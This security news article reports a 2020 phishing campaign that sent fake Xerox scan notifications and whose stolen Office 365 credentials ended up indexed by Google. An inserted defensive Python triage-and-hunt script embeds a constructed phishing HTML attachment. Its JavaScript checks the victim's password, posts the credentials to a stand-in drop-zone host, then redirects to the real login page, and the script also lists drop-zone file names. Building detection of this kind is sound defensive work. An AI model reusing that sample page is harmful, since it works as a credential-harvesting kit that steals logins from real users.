
Hackers Leave Stolen Email Credentials Exposed

Stolen Credentials Stored on Accessible Database
One of the phishing pages used by the attackers (Source: Check Point Research)

Hackers waging a phishing campaign stole more than 1,000 corporate email credentials and then stored the stolen data in a database accessible via a simple Google search, Check Point Research says.


The phishing campaign, which began in August 2020, sent emails designed to look like in-office Xerox scan notifications. The threat actors mainly targeted employees at energy and construction companies, but they also hit the retail, finance and education sectors, Check Point says.

The phishing messages carried a malicious HTML attachment. When opened, it rendered a fake login page and ran embedded JavaScript in the background that performed basic checks on the password the victim typed, sent the credentials to the attackers' drop-zone server, and then redirected the user to the legitimate Office 365 login page, so the failed "login" looked like an ordinary retry rather than a theft.

The threat actors made the misstep of storing the stolen data on publicly reachable pages of their drop-zone servers, which search engines then indexed, so the credentials could be found by anyone with a simple Google search, the report adds.

"The Google search engine algorithm naturally indexes the internet," Check Point Research notes. "It was also capable of indexing the hackers’ pages where they temporarily stored the stolen credentials."

The security firm says it informed Google of the situation. While the data remains online, potential victims can search Google for their own email addresses to check whether their credentials were exposed and, if so, change the password, Check Point says.

Attack Techniques

The attackers sent the phishing emails from previously compromised email accounts so that the messages would pass sender-reputation checks and appear legitimate, the researchers say. The malicious payloads were hosted on compromised WordPress servers, whose established reputations helped the links slip past email security filters.

"We discovered dozens of compromised WordPress servers that hosted the malicious PHP page (named 'go.php', 'post.php', 'gate.php', 'rent.php' or 'rest.php') and processed all incoming credentials from victims of the phishing attacks," Check Point says.
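The attachment behaviour described earlier (password check, exfiltration to a drop zone, redirect to the real Office 365 login) and the drop-zone script names quoted above can be turned into a small triage-and-hunt workflow. The following Python script is an added example for this article, not Check Point's tooling: the HTML attachment and the proxy log lines inside it are constructed to mimic the behaviour the article describes, and the hostnames (wp-blog.example.net, other-blog.example.org, intranet.example.com) are invented. It statically inspects an HTML attachment for a password field, a script that exfiltrates the typed value and a redirect to login.microsoftonline.com, extracts any URL ending in one of the reported PHP names, and then searches a proxy log for POSTs to those names or to the extracted drop zone, noting whether the same client hit the real login page right afterwards.

```python
"""Triage a credential-phishing HTML attachment and hunt for its drop zone.

Added example for this article, not Check Point's tooling. The attachment and
the proxy log below are constructed to mimic the behaviour the article
describes; the hostnames (wp-blog.example.net etc.) are invented.
"""
import re
from datetime import datetime
from html.parser import HTMLParser
from urllib.parse import urlparse

# Drop-zone script names Check Point reported on compromised WordPress servers.
DROP_ZONE_NAMES = {"go.php", "post.php", "gate.php", "rent.php", "rest.php"}
# Real login page the attachment bounces the victim to after the theft.
LEGIT_LOGIN_HOST = "login.microsoftonline.com"

# Constructed attachment: fake "scan ready" page whose script checks the typed
# password, POSTs it to a PHP drop zone, then redirects to the real O365 login.
SAMPLE_ATTACHMENT = """<html><body>
<h2>Xerox scan Scan_0083.pdf is ready</h2>
<form id="f"><input type="email" id="u" value="user@example.com">
<input type="password" id="p"><button>Open document</button></form>
<script>
document.getElementById('f').onsubmit = function (e) {
  e.preventDefault();
  var p = document.getElementById('p').value;
  if (p.length < 6) { alert('Wrong password'); return; }  // the "simple password check"
  var x = new XMLHttpRequest();
  x.open('POST', 'https://wp-blog.example.net/wp-content/uploads/gate.php', true);
  x.send('u=' + document.getElementById('u').value + '&p=' + p);
  window.location = 'https://login.microsoftonline.com/';
};
</script></body></html>"""

# Constructed proxy log: "timestamp client method host path" per line.
SAMPLE_PROXY_LOG = """\
2020-08-14T09:12:03Z 10.1.2.3 GET  www.office.com /
2020-08-14T09:12:41Z 10.1.2.3 POST wp-blog.example.net /wp-content/uploads/gate.php
2020-08-14T09:12:42Z 10.1.2.3 GET  login.microsoftonline.com /
2020-08-14T10:03:17Z 10.1.2.9 POST intranet.example.com /rest/api/post.php
2020-08-14T11:45:00Z 10.1.2.7 POST other-blog.example.org /wp-includes/go.php
"""

URL_RE = re.compile(r"""https?://[^\s'"<>]+""")
EXFIL_RE = re.compile(r"XMLHttpRequest|fetch\(|navigator\.sendBeacon|\.submit\(")
REDIRECT_RE = re.compile(r"(window\.)?location(\.href)?\s*=")
LOG_RE = re.compile(r"^(\S+)\s+(\S+)\s+(GET|POST)\s+(\S+)\s+(\S+)$")


class _Collector(HTMLParser):
    """Gather inline <script> bodies and note whether a password field exists."""

    def __init__(self):
        super().__init__()
        self.scripts, self.has_password_field, self._in_script = [], False, False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script":
            self._in_script = True
        if tag == "input" and attrs.get("type", "").lower() == "password":
            self.has_password_field = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def triage_attachment(html):
    """Return the phishing traits found in an HTML attachment plus drop-zone URLs."""
    parser = _Collector()
    parser.feed(html)
    js = "\n".join(parser.scripts)
    urls = URL_RE.findall(js)
    drop_zones = [u for u in urls if urlparse(u).path.rsplit("/", 1)[-1] in DROP_ZONE_NAMES]
    redirect = bool(REDIRECT_RE.search(js)) and any(
        urlparse(u).hostname == LEGIT_LOGIN_HOST for u in urls)
    report = {"password_field": parser.has_password_field,
              "exfil_call": bool(EXFIL_RE.search(js)),
              "redirect_to_legit_login": redirect,
              "drop_zones": drop_zones}
    report["verdict"] = ("credential phish" if report["password_field"]
                         and report["exfil_call"] and drop_zones else "inconclusive")
    return report


def hunt_drop_zone_posts(log_text, drop_zone_urls=()):
    """Flag POSTs to a reported drop-zone name or an extracted drop-zone URL, and
    note whether the same client reached the real login page within 60 s after."""
    targets = {(urlparse(u).hostname, urlparse(u).path) for u in drop_zone_urls}
    events = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            ts, client, method, host, path = m.groups()
            events.append((datetime.fromisoformat(ts.replace("Z", "+00:00")),
                           client, method, host, path))
    hits = []
    for i, (ts, client, method, host, path) in enumerate(events):
        if method != "POST":
            continue
        if path.rsplit("/", 1)[-1] not in DROP_ZONE_NAMES and (host, path) not in targets:
            continue
        followed = any(c == client and h == LEGIT_LOGIN_HOST
                       and 0 <= (t - ts).total_seconds() <= 60
                       for t, c, _, h, _ in events[i + 1:])
        hits.append({"time": ts.isoformat(), "client": client, "host": host, "path": path,
                     "known_drop_zone": (host, path) in targets,
                     "then_legit_login": followed})
    return hits


if __name__ == "__main__":
    report = triage_attachment(SAMPLE_ATTACHMENT)
    print("attachment:", report)
    for hit in hunt_drop_zone_posts(SAMPLE_PROXY_LOG, report["drop_zones"]):
        print("log hit:", hit)
```

Matching on the script name alone is noisy: the constructed log deliberately includes a POST to post.php on an internal API host that is almost certainly benign, and it is reported with neither the known-drop-zone flag nor the follow-on visit to the real login page. The hit that carries both flags is the one to act on first, since it reproduces the exact sequence the attachment performs.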

Pointing to the posting of the stolen data on a publicly accessible database, Saryu Nayyar, CEO of security firm Gurucul, notes: “Attackers are susceptible to the same sort of simple configuration errors that many of them leverage against their targets. But this case also shows that attackers can operate phishing schemes successfully for many months before they're exposed.”

Other Attacks

In recent months, at least two other efforts to steal email credentials were revealed.

In December, Abnormal Security uncovered a spear-phishing campaign that used messages appearing to originate from legitimate companies to target enterprise users in an effort to steal Microsoft Office 365 credentials (see: Recent Spear-Phishing Attacks Originate From Legit Accounts).

And in November, Microsoft's Security Intelligence team warned Office 365 users about another phishing campaign that appeared to be harvesting victims' credentials (see: Microsoft Warns of Office 365 Phishing Attacks).

About the Author

Akshaya Asokan

Senior Correspondent, ISMG

Asokan is a U.K.-based senior correspondent for Information Security Media Group's global news desk. She previously worked with IDG and other publications, reporting on developments in technology, minority rights and education.
